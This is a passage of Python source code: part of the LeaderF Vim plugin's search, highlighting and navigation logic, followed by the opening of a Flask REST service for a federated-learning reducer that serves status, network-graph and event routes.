partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine, pattern=pattern, is_name_only=not self._cli.isFullPath) highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, True) elif is_fuzzyMatch_C and isAscii(self._cli.pattern): use_fuzzy_match_c = True pattern = fuzzyMatchC.initPattern(self._cli.pattern) if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath: getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False) getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False) else: getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True) getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True) filter_method = partial(self._fuzzyFilter, self._cli.isFullPath, getWeight) highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights) else: fuzzy_match = FuzzyMatch(self._cli.pattern, encoding) if self._getExplorer().getStlCategory() == "File" 
and self._cli.isFullPath: filter_method = partial(self._fuzzyFilter, self._cli.isFullPath, fuzzy_match.getWeight2) elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag", "Function", "History", "Cmd_History", "Search_History", "Rg"]: filter_method = partial(self._fuzzyFilter, self._cli.isFullPath, fuzzy_match.getWeight3) else: filter_method = partial(self._fuzzyFilter, self._cli.isFullPath, fuzzy_match.getWeight) highlight_method = partial(self._highlight, self._cli.isFullPath, fuzzy_match.getHighlights) if self._cli.isAndMode: if self._fuzzy_engine and isAscii(''.join(self._cli.pattern)): step = 20000 * cpu_count else: step = 10000 pair, highlight_methods = self._filter(step, filter_method, content, is_continue) pairs = sorted(zip(*pair), key=operator.itemgetter(0), reverse=True) self._result_content = self._getList(pairs) elif use_fuzzy_engine: if step == 0: if return_index == True: step = 20000 * cpu_count else: step = 40000 * cpu_count pair = self._filter(step, filter_method, content, is_continue, True, return_index) if is_continue: # result is not sorted pairs = sorted(zip(*pair), key=operator.itemgetter(0), reverse=True) self._result_content = self._getList(pairs) else: self._result_content = pair[1] else: if step == 0: if use_fuzzy_match_c: step = 40000 elif self._getExplorer().supportsNameOnly() and self._cli.isFullPath: step = 6000 else: step = 12000 pairs = self._filter(step, filter_method, content, is_continue) pairs.sort(key=operator.itemgetter(0), reverse=True) self._result_content = self._getList(pairs) self._getInstance().setBuffer(self._result_content[:self._initial_count]) self._getInstance().setStlResultsCount(len(self._result_content)) if self._cli.isAndMode: self._highlight_method = partial(self._highlight_and_mode, highlight_methods) self._highlight_method() else: self._highlight_method = highlight_method self._highlight_method() def _highlight_and_mode(self, highlight_methods): self._clearHighlights() for i, highlight_method in enumerate(highlight_methods): highlight_method(hl_group='Lf_hl_match' + str(i % 5)) def _clearHighlights(self): for i in self._highlight_ids: lfCmd("silent! call matchdelete(%d)" % i) self._highlight_ids = [] def _clearHighlightsPos(self): self._highlight_pos = [] self._highlight_pos_list = [] self._highlight_refine_pos = [] def _resetHighlights(self): self._clearHighlights() unit = self._getUnit() bottom = len(self._getInstance().buffer) - self._help_length if self._cli.isAndMode: highlight_pos_list = self._highlight_pos_list else: highlight_pos_list = [self._highlight_pos] for n, highlight_pos in enumerate(highlight_pos_list): hl_group = 'Lf_hl_match' + str(n % 5) for i, pos in enumerate(highlight_pos): if self._getInstance().isReverseOrder(): pos = [[bottom - unit*i] + p for p in pos] else: pos = [[unit*i + 1 + self._help_length] + p for p in pos] # The maximum number of positions is 8 in matchaddpos(). for j in range(0, len(pos), 8): id = int(lfEval("matchaddpos('%s', %s)" % (hl_group, str(pos[j:j+8])))) self._highlight_ids.append(id) for i, pos in enumerate(self._highlight_refine_pos): if self._getInstance().isReverseOrder(): pos = [[bottom - unit*i] + p for p in pos] else: pos = [[unit*i + 1 + self._help_length] + p for p in pos] # The maximum number of positions is 8 in matchaddpos(). 
for j in range(0, len(pos), 8): id = int(lfEval("matchaddpos('Lf_hl_matchRefine', %s)" % str(pos[j:j+8]))) self._highlight_ids.append(id) def _highlight(self, is_full_path, get_highlights, use_fuzzy_engine=False, clear=True, hl_group='Lf_hl_match'): # matchaddpos() is introduced by Patch 7.4.330 if (lfEval("exists('*matchaddpos')") == '0' or lfEval("g:Lf_HighlightIndividual") == '0'): return cb = self._getInstance().buffer if self._getInstance().empty(): # buffer is empty. return highlight_number = int(lfEval("g:Lf_NumberOfHighlight")) if clear: self._clearHighlights() getDigest = partial(self._getDigest, mode=0 if is_full_path else 1) unit = self._getUnit() if self._getInstance().isReverseOrder(): if self._help_length > 0: content = cb[:-self._help_length][::-1] else: content = cb[:][::-1] else: content = cb[self._help_length:] if use_fuzzy_engine: self._highlight_pos = get_highlights(source=[getDigest(line) for line in content[:highlight_number:unit]]) else: # e.g., self._highlight_pos = [ [ [2,3], [6,2] ], [ [1,4], [7,6], ... ], ... ] # where [2, 3] indicates the highlight starts at the 2nd column with the # length of 3 in bytes self._highlight_pos = [get_highlights(getDigest(line)) for line in content[:highlight_number:unit]] if self._cli.isAndMode: self._highlight_pos_list.append(self._highlight_pos) bottom = len(content) for i, pos in enumerate(self._highlight_pos): start_pos = self._getDigestStartPos(content[unit*i], 0 if is_full_path else 1) if start_pos > 0: for j in range(len(pos)): pos[j][0] += start_pos if self._getInstance().isReverseOrder(): pos = [[bottom - unit*i] + p for p in pos] else: pos = [[unit*i + 1 + self._help_length] + p for p in pos] # The maximum number of positions is 8 in matchaddpos(). for j in range(0, len(pos), 8): id = int(lfEval("matchaddpos('%s', %s)" % (hl_group, str(pos[j:j+8])))) self._highlight_ids.append(id) def _highlightRefine(self, first_get_highlights, get_highlights): # matchaddpos() is introduced by Patch 7.4.330 if (lfEval("exists('*matchaddpos')") == '0' or lfEval("g:Lf_HighlightIndividual") == '0'): return cb = self._getInstance().buffer if self._getInstance().empty(): # buffer is empty. return highlight_number = int(lfEval("g:Lf_NumberOfHighlight")) self._clearHighlights() getDigest = self._getDigest unit = self._getUnit() if self._getInstance().isReverseOrder(): if self._help_length > 0: content = cb[:-self._help_length][::-1] else: content = cb[:][::-1] else: content = cb[self._help_length:] bottom = len(content) self._highlight_pos = [first_get_highlights(getDigest(line, 1)) for line in content[:highlight_number:unit]] for i, pos in enumerate(self._highlight_pos): start_pos = self._getDigestStartPos(content[unit*i], 1) if start_pos > 0: for j in range(len(pos)): pos[j][0] += start_pos if self._getInstance().isReverseOrder(): pos = [[bottom - unit*i] + p for p in pos] else: pos = [[unit*i + 1 + self._help_length] + p for p in pos] # The maximum number of positions is 8 in matchaddpos(). 
for j in range(0, len(pos), 8): id = int(lfEval("matchaddpos('Lf_hl_match', %s)" % str(pos[j:j+8]))) self._highlight_ids.append(id) self._highlight_refine_pos = [get_highlights(getDigest(line, 2)) for line in content[:highlight_number:unit]] for i, pos in enumerate(self._highlight_refine_pos): start_pos = self._getDigestStartPos(content[unit*i], 2) if start_pos > 0: for j in range(len(pos)): pos[j][0] += start_pos if self._getInstance().isReverseOrder(): pos = [[bottom - unit*i] + p for p in pos] else: pos = [[unit*i + 1 + self._help_length] + p for p in pos] # The maximum number of positions is 8 in matchaddpos(). for j in range(0, len(pos), 8): id = int(lfEval("matchaddpos('Lf_hl_matchRefine', %s)" % str(pos[j:j+8]))) self._highlight_ids.append(id) def _regexFilter(self, iterable): def noErrMatch(text, pattern): try: return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text, pattern)) except TypeError: # python 2 return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern)) except ValueError: # python 3 return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern)) try: if ('-2' == lfEval("g:LfNoErrMsgMatch('', '%s')" % escQuote(self._cli.pattern))): return iter([]) else: return (line for line in iterable if noErrMatch(escQuote(self._getDigest(line, 0).strip()), escQuote(self._cli.pattern))) except vim.error: return iter([]) def _regexSearch(self, content, is_continue, step): if not self._cli.isPrefix: self._index = 0 self._result_content = self._filter(8000, self._regexFilter, content, is_continue) self._getInstance().setBuffer(self._result_content[:self._initial_count]) self._getInstance().setStlResultsCount(len(self._result_content)) def clearSelections(self): for i in self._selections.values(): lfCmd("call matchdelete(%d)" % i) self._selections.clear() def _cleanup(self): if lfEval("g:Lf_RememberLastSearch") == '0': self._pattern_bak = self._cli.pattern self._cli.clear() self._clearHighlights() self._clearHighlightsPos() self.clearSelections() @modifiableController def toggleHelp(self): self._show_help = not self._show_help if self._getInstance().isReverseOrder(): if self._help_length > 0: del self._getInstance().buffer[-self._help_length:] else: del self._getInstance().buffer[:self._help_length] self._createHelpHint() self.clearSelections() self._resetHighlights() if self._getInstance().isReverseOrder(): self._getInstance().window.height = len(self._getInstance().buffer) def _accept(self, file, mode, *args, **kwargs): if file: if mode == '': pass elif mode == 'h': lfCmd("split") elif mode == 'v': lfCmd("bel vsplit") kwargs["mode"] = mode tabpage_count = len(vim.tabpages) self._acceptSelection(file, *args, **kwargs) if mode == 't' and len(vim.tabpages) > tabpage_count: tab_pos = int(lfEval("g:Lf_TabpagePosition")) if tab_pos == 0: lfCmd("tabm 0") elif tab_pos == 1: lfCmd("tabm -1") elif tab_pos == 3: lfCmd("tabm") def accept(self, mode=''): if self._getInstance().isReverseOrder(): if self._getInstance().window.cursor[0] > len(self._getInstance().buffer) - self._help_length: lfCmd("norm! k") return else: if self._getInstance().window.cursor[0] <= self._help_length: lfCmd("norm! 
j") return if self._getExplorer().getStlCategory() == "Rg" \ and self._getInstance().currentLine == self._getExplorer().getContextSeparator(): return self._cli.writeHistory(self._getExplorer().getStlCategory()) # https://github.com/neovim/neovim/issues/8336 if lfEval("has('nvim')") == '1': chdir = vim.chdir else: chdir = os.chdir cwd = os.getcwd() if len(self._selections) > 0: files = [] for i in sorted(self._selections.keys()): files.append(self._getInstance().buffer[i-1]) if "--stayOpen" in self._arguments: try: vim.current.tabpage, vim.current.window, vim.current.buffer = self._getInstance().getOriginalPos() except vim.error: # error if original buffer is an No Name buffer pass else: self._getInstance().exitBuffer() # https://github.com/Yggdroot/LeaderF/issues/257 win_local_cwd = lfEval("getcwd(winnr())") if cwd != win_local_cwd: chdir(cwd) orig_cwd = os.getcwd() if mode == '': self._argaddFiles(files) self._accept(files[0], mode) else: for file in files: self._accept(file, mode) if os.getcwd() != orig_cwd: dir_changed_by_autocmd = True else: dir_changed_by_autocmd = False need_exit = True else: file = self._getInstance().currentLine line_nr = self._getInstance().window.cursor[0] need_exit = self._needExit(file, self._arguments) if need_exit: if "--stayOpen" in self._arguments: try: vim.current.tabpage, vim.current.window, vim.current.buffer = self._getInstance().getOriginalPos() except vim.error: # error if original buffer is an No Name buffer pass else: self._getInstance().exitBuffer() # https://github.com/Yggdroot/LeaderF/issues/257 win_local_cwd = lfEval("getcwd(winnr())") if cwd != win_local_cwd: chdir(cwd) orig_cwd = os.getcwd() self._accept(file, mode, self._getInstance().buffer, line_nr) # for bufTag if os.getcwd() != orig_cwd: dir_changed_by_autocmd = True else: dir_changed_by_autocmd = False if need_exit: self._setAutochdir() if dir_changed_by_autocmd == False: self._restoreOrigCwd() return None else: self._beforeExit() self._content = vim.current.buffer[:] return False def _jumpNext(self): instance = self._getInstance() if instance.window is None or instance.empty() or len(instance.buffer) == self._help_length: return False if instance.isReverseOrder(): if instance.window.valid: if instance.window.cursor[0] > len(instance.buffer) - self._help_length: instance.window.cursor = (len(instance.buffer) - self._help_length, 0) elif instance.window.cursor[0] == 1: # at the first line instance.window.cursor = (len(instance.buffer) - self._help_length, 0) else: instance.window.cursor = (instance.window.cursor[0] - 1, 0) instance.window.options["cursorline"] = True instance.gotoOriginalWindow() self._accept(instance.buffer[instance.window.cursor[0] - 1], "") else: if instance.cursorRow > len(instance.buffer) - instance.helpLength: instance.cursorRow = len(instance.buffer) - instance.helpLength elif instance.cursorRow == 1: # at the last line instance.cursorRow = len(instance.buffer) - instance.helpLength else: instance.cursorRow -= 1 self._accept(instance.buffer[instance.cursorRow - 1], "") lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \ (len(instance.buffer) - instance.cursorRow - instance.helpLength + 1, len(instance.buffer) - instance.helpLength)) else: if instance.window.valid: if instance.window.cursor[0] <= self._help_length: instance.window.cursor = (self._help_length + 1, 0) elif instance.window.cursor[0] == len(instance.buffer): # at the last line instance.window.cursor = (self._help_length + 1, 0) else: instance.window.cursor = 
(instance.window.cursor[0] + 1, 0) instance.window.options["cursorline"] = True instance.gotoOriginalWindow() self._accept(instance.buffer[instance.window.cursor[0] - 1], "") else: if instance.cursorRow <= instance.helpLength: instance.cursorRow = instance.helpLength + 1 elif instance.cursorRow == len(instance.buffer): # at the last line instance.cursorRow = instance.helpLength + 1 else: instance.cursorRow += 1 self._accept(instance.buffer[instance.cursorRow - 1], "") lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \ (instance.cursorRow - instance.helpLength, len(instance.buffer) - instance.helpLength)) return True def _jumpPrevious(self): instance = self._getInstance() if instance.window is None or instance.empty() or len(instance.buffer) == self._help_length: return False if instance.isReverseOrder(): if instance.window.valid: if instance.window.cursor[0] >= len(instance.buffer) - self._help_length: instance.window.cursor = (1, 0) else: instance.window.cursor = (instance.window.cursor[0] + 1, 0) instance.window.options["cursorline"] = True instance.gotoOriginalWindow() self._accept(instance.buffer[instance.window.cursor[0] - 1], "") else: if instance.cursorRow >= len(instance.buffer) - instance.helpLength: instance.cursorRow = 1 else: instance.cursorRow += 1 self._accept(instance.buffer[instance.cursorRow - 1], "") lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \ (len(instance.buffer) - instance.cursorRow - instance.helpLength + 1, len(instance.buffer) - instance.helpLength)) else: if instance.window.valid: if instance.window.cursor[0] <= self._help_length + 1: instance.window.cursor = (len(instance.buffer), 0) else: instance.window.cursor = (instance.window.cursor[0] - 1, 0) instance.window.options["cursorline"] = True instance.gotoOriginalWindow() self._accept(instance.buffer[instance.window.cursor[0] - 1], "") else: if instance.cursorRow <= instance.helpLength + 1: instance.cursorRow = len(instance.buffer) else: instance.cursorRow -= 1 self._accept(instance.buffer[instance.cursorRow - 1], "") lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \ (instance.cursorRow - instance.helpLength, len(instance.buffer) - instance.helpLength)) def quit(self): self._getInstance().exitBuffer() self._setAutochdir() self._restoreOrigCwd() def refresh(self, normal_mode=True): self._getExplorer().cleanup() content = self._getExplorer().getFreshContent() if not content: lfCmd("echohl Error | redraw | echo ' No content!' | echohl NONE") return if normal_mode: # when called in Normal mode self._getInstance().buffer.options['modifiable'] = True self._clearHighlights() self._clearHighlightsPos() self.clearSelections() self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent) self._iteration_end = True if self._cli.pattern: self._index = 0 self._search(self._content) if normal_mode: # when called in Normal mode self._createHelpHint() self._resetHighlights() self._getInstance().buffer.options['modifiable'] = False def addSelections(self): nr = self._getInstance().window.number if (int(lfEval("v:mouse_win")) != 0 and nr != int(lfEval("v:mouse_win"))): return elif nr == int(lfEval("v:mouse_win")): lfCmd("exec v:mouse_lnum") lfCmd("exec 'norm!'.v:mouse_col.'|'") line_nr = self._getInstance().window.cursor[0] if line_nr <= self._help_length: lfCmd("norm! 
j") return if line_nr in self._selections: lfCmd("call matchdelete(%d)" % self._selections[line_nr]) del self._selections[line_nr] else: id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % line_nr)) self._selections[line_nr] = id def selectMulti(self): orig_line = self._getInstance().window.cursor[0] nr = self._getInstance().window.number if (int(lfEval("v:mouse_win")) != 0 and nr != int(lfEval("v:mouse_win"))): return elif nr == int(lfEval("v:mouse_win")): cur_line = int(lfEval("v:mouse_lnum")) self.clearSelections() for i in range(min(orig_line, cur_line), max(orig_line, cur_line)+1): if i > self._help_length and i not in self._selections: id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % (i))) self._selections[i] = id def selectAll(self): line_num = len(self._getInstance().buffer) if line_num > 300: lfCmd("echohl Error | redraw | echo ' Too many files selected!' | echohl NONE") lfCmd("sleep 1") return for i in range(line_num): if i >= self._help_length and i+1 not in self._selections: id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % (i+1))) self._selections[i+1] = id def startExplorer(self, win_pos, *args, **kwargs): arguments_dict = kwargs.get("arguments", {}) self.setArguments(arguments_dict) self._cli.setNameOnlyFeature(self._getExplorer().supportsNameOnly()) self._cli.setRefineFeature(self._supportsRefine()) if self._getExplorer().getStlCategory() in ["Gtags"]: if "--update" in self._arguments or "--remove" in self._arguments: self._getExplorer().getContent(*args, **kwargs) return if "--next" in arguments_dict: if self._jumpNext() == False: lfCmd("echohl Error | redraw | echo 'Error, no content!' | echohl NONE") return elif "--previous" in arguments_dict: if self._jumpPrevious() == False: lfCmd("echohl Error | redraw | echo 'Error, no content!' | echohl NONE") return # lfCmd("echohl WarningMsg | redraw | echo ' searching ...' | echohl NONE") if self._getExplorer().getStlCategory() in ["Rg", "Gtags"] and "--recall" in self._arguments: content = self._content else: content = self._getExplorer().getContent(*args, **kwargs) self._getInstance().setCwd(os.getcwd()) if self._getExplorer().getStlCategory() in ["Gtags"] and "--auto-jump" in self._arguments \ and isinstance(content, list) and len(content) == 1: mode = self._arguments["--auto-jump"][0] if len(self._arguments["--auto-jump"]) else "" self._accept(content[0], mode) return if not content: lfCmd("echohl Error | redraw | echo ' No content!' | echohl NONE") return self._getInstance().setArguments(self._arguments) if self._getExplorer().getStlCategory() in ["Rg"] and ("-A" in arguments_dict \ or "-B" in arguments_dict or "-C" in arguments_dict): self._getInstance().ignoreReverse() self._getInstance().enterBuffer(win_pos) self._initial_count = self._getInstance().getInitialWinHeight() self._getInstance().setStlCategory(self._getExplorer().getStlCategory()) self._setStlMode(**kwargs) self._getInstance().setStlCwd(self._getExplorer().getStlCurDir()) if lfEval("g:Lf_RememberLastSearch") == '1' and self._launched and self._cli.pattern: pass else: lfCmd("normal! 
gg") self._index = 0 self._pattern = kwargs.get("pattern", "") or arguments_dict.get("--input", [""])[0] self._cli.setPattern(self._pattern) self._start_time = time.time() self._bang_start_time = self._start_time self._status_start_time = self._start_time self._bang_count = 0 self._read_content_exception = None if isinstance(content, list): self._is_content_list = True if len(content[0]) == len(content[0].rstrip("\r\n")): self._content = content else: self._content = [line.rstrip("\r\n") for line in content] self._getInstance().setStlTotal(len(self._content)//self._getUnit()) self._result_content = self._content self._getInstance().setStlResultsCount(len(self._content)) if lfEval("g:Lf_RememberLastSearch") == '1' and self._launched and self._cli.pattern: pass else: self._getInstance().setBuffer(self._content[:self._initial_count]) if lfEval("has('nvim')") == '1': lfCmd("redrawstatus") self._callback = self._workInIdle if not kwargs.get('bang', 0): self.input() else: self._getInstance().appendBuffer(self._content[self._initial_count:]) lfCmd("echo") self._getInstance().buffer.options['modifiable'] = False self._bangEnter() elif isinstance(content, AsyncExecutor.Result): self._is_content_list = False self._result_content = [] self._callback = self._workInIdle if lfEval("g:Lf_CursorBlink") == '0': self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent) else: if self._getExplorer().getStlCategory() in ["Rg", "Gtags"]: if "--append" in self.getArguments(): self._offset_in_content = len(self._content) if self._pattern_bak: self._getInstance().setBuffer(self._content) self._createHelpHint() else: self._getInstance().clearBuffer() self._content = [] self._offset_in_content = 0 else: self._content = [] self._offset_in_content = 0 self._read_finished = 0 self._stop_reader_thread = False self._reader_thread = threading.Thread(target=self._readContent, args=(content,)) self._reader_thread.daemon = True self._reader_thread.start() if not kwargs.get('bang', 0): self.input() else: lfCmd("echo") self._getInstance().buffer.options['modifiable'] = False self._bangEnter() else: self._is_content_list = False self._result_content = [] self._callback = partial(self._workInIdle, content) if lfEval("g:Lf_CursorBlink") == '0': self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent) else: self._content = [] self._offset_in_content = 0 self._read_finished = 0 if not kwargs.get('bang', 0): self.input() else: lfCmd("echo") self._getInstance().buffer.options['modifiable'] = False self._bangEnter() self._launched = True def _readContent(self, content): try: for line in content: self._content.append(line) if self._stop_reader_thread: break else: self._read_finished = 1 except Exception: self._read_finished = 1 self._read_content_exception = sys.exc_info() def _setResultContent(self): if len(self._result_content) > len(self._getInstance().buffer): self._getInstance().setBuffer(self._result_content) elif self._index == 0: self._getInstance().setBuffer(self._content) def _workInIdle(self, content=None, bang=False): if self._read_content_exception is not None: if bang == True: if self._timer_id is not None: lfCmd("call timer_stop(%s)" % self._timer_id) self._timer_id = None lfPrintError(self._read_content_exception[1]) return else: raise self._read_content_exception[1] if self._is_content_list: if self._cli.pattern and (self._index < len(self._content) or len(self._cb_content) > 0): if self._fuzzy_engine: step = 10000 * 
cpu_count elif is_fuzzyMatch_C: step = 10000 else: step = 2000 self._search(self._content, True, step) return if content: i = -1 for i, line in enumerate(itertools.islice(content, 20)): self._content.append(line) if i == -1: self._read_finished = 1 if self._read_finished > 0: if self._read_finished == 1: self._read_finished += 1 self._getExplorer().setContent(self._content) if self._cli.pattern: self._getInstance().setStlResultsCount(len(self._result_content)) else: if bang: if self._getInstance().empty(): self._offset_in_content = len(self._content) self._getInstance().appendBuffer(self._content[:self._offset_in_content]) else: cur_len = len(self._content) self._getInstance().appendBuffer(self._content[self._offset_in_content:cur_len]) self._offset_in_content = cur_len if self._timer_id is not None: lfCmd("call timer_stop(%s)" % self._timer_id) self._timer_id = None self._bangReadFinished() lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE") else: self._getInstance().setBuffer(self._content[:self._initial_count]) self._getInstance().setStlTotal(len(self._content)//self._getUnit()) self._getInstance().setStlRunning(False) self._getInstance().setStlResultsCount(len(self._content)) lfCmd("redrawstatus") if self._cli.pattern and (self._index < len(self._content) or len(self._cb_content) > 0): if self._fuzzy_engine: step = 10000 * cpu_count elif is_fuzzyMatch_C: step = 10000 else: step = 2000 self._search(self._content, True, step) else: cur_len = len(self._content) if time.time() - self._start_time > 0.1: self._start_time = time.time() self._getInstance().setStlTotal(cur_len//self._getUnit()) if time.time() - self._status_start_time > 0.45: self._status_start_time = time.time() self._getInstance().setStlRunning(True) if self._cli.pattern: self._getInstance().setStlResultsCount(len(self._result_content)) else: self._getInstance().setStlResultsCount(cur_len) lfCmd("redrawstatus") if self._cli.pattern: if self._index < cur_len or len(self._cb_content) > 0: if self._fuzzy_engine: step = 10000 * cpu_count elif is_fuzzyMatch_C: step = 10000 else: step = 2000 self._search(self._content[:cur_len], True, step) else: if bang: if self._getInstance().empty(): self._offset_in_content = len(self._content) self._getInstance().appendBuffer(self._content[:self._offset_in_content]) else: cur_len = len(self._content) self._getInstance().appendBuffer(self._content[self._offset_in_content:cur_len]) self._offset_in_content = cur_len if time.time() - self._bang_start_time > 0.5: self._bang_start_time = time.time() lfCmd("echohl WarningMsg | redraw | echo ' searching %s' | echohl NONE" % ('.' * self._bang_count)) self._bang_count = (self._bang_count + 1) % 9 elif len(self._getInstance().buffer) < min(cur_len, self._initial_count): self._getInstance().setBuffer(self._content[:self._initial_count]) @modifiableController def input(self): if self._timer_id is not None: lfCmd("call timer_stop(%s)" % self._timer_id) self._timer_id = None self._hideHelp() self._resetHighlights() if self._pattern: self._search(self._content) for cmd in self._cli.input(self._callback): cur_len = len(self._content) cur_content = self._content[:cur_len] if equal(cmd, '<Update>'): self._search(cur_content) elif equal(cmd, '<Shorten>'): if self._getInstance().isReverseOrder(): lfCmd("normal! G") else: lfCmd("normal! gg") self._index = 0 # search from beginning self._search(cur_content) elif equal(cmd, '<Mode>'): self._setStlMode() if self._getInstance().isReverseOrder(): lfCmd("normal! G") else: lfCmd("normal! 
gg") self._index = 0 # search from beginning if self._cli.pattern: self._search(cur_content) elif equal(cmd, '<C-K>'): self._toUp() self._previewResult(False) elif equal(cmd, '<C-J>'): self._toDown() self._previewResult(False) elif equal(cmd, '<Up>'): if self._cli.previousHistory(self._getExplorer().getStlCategory()): if self._getInstance().isReverseOrder(): lfCmd("normal! G") else: lfCmd("normal! gg") self._index = 0 # search from beginning self._search(cur_content) elif equal(cmd, '<Down>'): if self._cli.nextHistory(self._getExplorer().getStlCategory()): if self._getInstance().isReverseOrder(): lfCmd("normal! G") else: lfCmd("normal! gg") self._index = 0 # search from beginning self._search(cur_content) elif equal(cmd, '<LeftMouse>'): if self._leftClick(): break self._previewResult(False) elif equal(cmd, '<2-LeftMouse>'): self._leftClick() if self.accept() is None: break elif equal(cmd, '<CR>'): if self.accept() is None: break elif equal(cmd, '<C-X>'): if self.accept('h') is None: break elif equal(cmd, '<C-]>'): if self.accept('v') is None: break elif equal(cmd, '<C-T>'): if self.accept('t') is None: break elif equal(cmd, '<Quit>'): self._cli.writeHistory(self._getExplorer().getStlCategory()) self.quit() break elif equal(cmd, '<Tab>'): # switch to Normal mode self._setResultContent() self.clearSelections() self._cli.hideCursor() self._createHelpHint() self._resetHighlights() if self._getInstance().isReverseOrder() and self._cli.pattern \ and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \ and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")): self._highlight_method() break elif equal(cmd, '<F5>'): self.refresh(False) elif equal(cmd, '<C-LeftMouse>') or equal(cmd, '<C-S>'): if self._getExplorer().supportsMulti(): self.addSelections() elif equal(cmd, '<S-LeftMouse>'): if self._getExplorer().supportsMulti(): self.selectMulti() elif equal(cmd, '<C-A>'): if self._getExplorer().supportsMulti(): self.selectAll() elif equal(cmd, '<C-L>'): self.clearSelections() elif equal(cmd, '<C-P>'): self._ctrlp_pressed = True self._previewResult(True) self._ctrlp_pressed = False elif equal(cmd, '<PageUp>'): self._pageUp() self._previewResult(False) elif equal(cmd, '<PageDown>'): self._pageDown() self._previewResult(False) else: if self._cmdExtension(cmd): break # vim: set ts=4 sw=4 tw=0 et :
restservice.py
from fedn.clients.reducer.interfaces import CombinerInterface from fedn.clients.reducer.state import ReducerState, ReducerStateToString from flask_wtf.csrf import CSRFProtect from werkzeug.utils import secure_filename from flask import Flask, jsonify, render_template, request from flask import redirect, url_for, flash from threading import Lock import json import plotly import pandas as pd import numpy import math import plotly.express as px import geoip2.database from fedn.clients.reducer.plots import Plot UPLOAD_FOLDER = '/app/client/package/' ALLOWED_EXTENSIONS = {'gz', 'bz2', 'tar', 'zip', 'tgz'} def allowed_file(filename): return '.' in filename and \ filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS class ReducerRestService: def __init__(self, config, control, certificate_manager, certificate=None): print("config object!: \n\n\n\n{}".format(config)) if config['discover_host']: self.name = config['discover_host'] else: self.name = config['name'] self.port = config['discover_port'] self.network_id = config['name'] + '-network' if not config['token']: import uuid self.token = str(uuid.uuid4()) else: self.token = config['token'] self.control = control self.certificate = certificate self.certificate_manager = certificate_manager self.current_compute_context = None # self.control.get_compute_context() def to_dict(self): data = { 'name': self.name } return data def check_configured(self): if not self.control.get_compute_context(): return render_template('setup.html', client=self.name, state=ReducerStateToString(self.control.state()), logs=None, refresh=False, message='') if self.control.state() == ReducerState.setup: return render_template('setup.html', client=self.name, state=ReducerStateToString(self.control.state()), logs=None, refresh=True, message='Warning. Reducer is not base-configured. 
please do so with config file.') if not self.control.get_latest_model(): return render_template('setup_model.html', message="Please set the initial model.") return None def run(self): app = Flask(__name__) app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER csrf = CSRFProtect() import os SECRET_KEY = os.urandom(32) app.config['SECRET_KEY'] = SECRET_KEY csrf.init_app(app) @app.route('/') def index(): not_configured = self.check_configured() if not_configured: return not_configured events = self.control.get_events() message = request.args.get('message', None) message_type = request.args.get('message_type', None) return render_template('events.html', client=self.name, state=ReducerStateToString(self.control.state()), events=events, logs=None, refresh=True, configured=True, message=message, message_type=message_type) # http://localhost:8090/add?name=combiner&address=combiner&port=12080&token=e9a3cb4c5eaff546eec33ff68a7fbe232b68a192 @app.route('/status') def status(): return {'state': ReducerStateToString(self.control.state())} @app.route('/netgraph') def netgraph(): result = {'nodes': [], 'edges': []} result['nodes'].append({ "id": "r0", "label": "Reducer", "x": -1.2, "y": 0, "size": 25, "type": 'reducer', }) x = 0 y = 0 count = 0 meta = {} combiner_info = [] for combiner in self.control.network.get_combiners(): try: report = combiner.report() combiner_info.append(report) except: pass y = y + 0.5 width = 5 if len(combiner_info) < 1: return result step = 5 / len(combiner_info) x = -width / 3.0 for combiner in combiner_info: print("combiner info {}".format(combiner_info), flush=True) try: result['nodes'].append({ "id": combiner['name'], # "n{}".format(count), "label": "Combiner ({} clients)".format(combiner['nr_active_clients']), "x": x, "y": y, "size": 15, "name": combiner['name'], "type": 'combiner', # "color":'blue', }) except Exception as err: print(err) x = x + step count = count + 1 y = y + 0.25 count = 0 width = 5 step = 5 / len(combiner_info) x = -width / 2.0 # for combiner in self.control.statestore.list_clients(): for combiner in combiner_info: for a in range(0, int(combiner['nr_active_clients'])): # y = y + 0.25 try: result['nodes'].append({ "id": "c{}".format(count), "label": "Client", "x": x, "y": y, "size": 15, "name": "c{}".format(count), "combiner": combiner['name'], "type": 'client', # "color":'blue', }) except Exception as err: print(err) # print("combiner prefferred name {}".format(client['combiner']), flush=True) x = x + 0.25 count = count + 1 count = 0 for node in result['nodes']: try: if node['type'] == 'combiner': result['edges'].append( { "id": "e{}".format(count), "source": node['id'], "target": 'r0', } ) elif node['type'] == 'client': result['edges'].append( { "id": "e{}".format(count), "source": node['combiner'], "target": node['id'], } ) except Exception as e: pass count = count + 1 return result @app.route('/events') def events(): import json from bson import json_util json_docs = [] for doc in self.control.get_events(): json_doc = json.dumps(doc, default=json_util.default) json_docs.append(json_doc) json_docs.reverse() return {'events': json_docs} @app.route('/add') def add(): 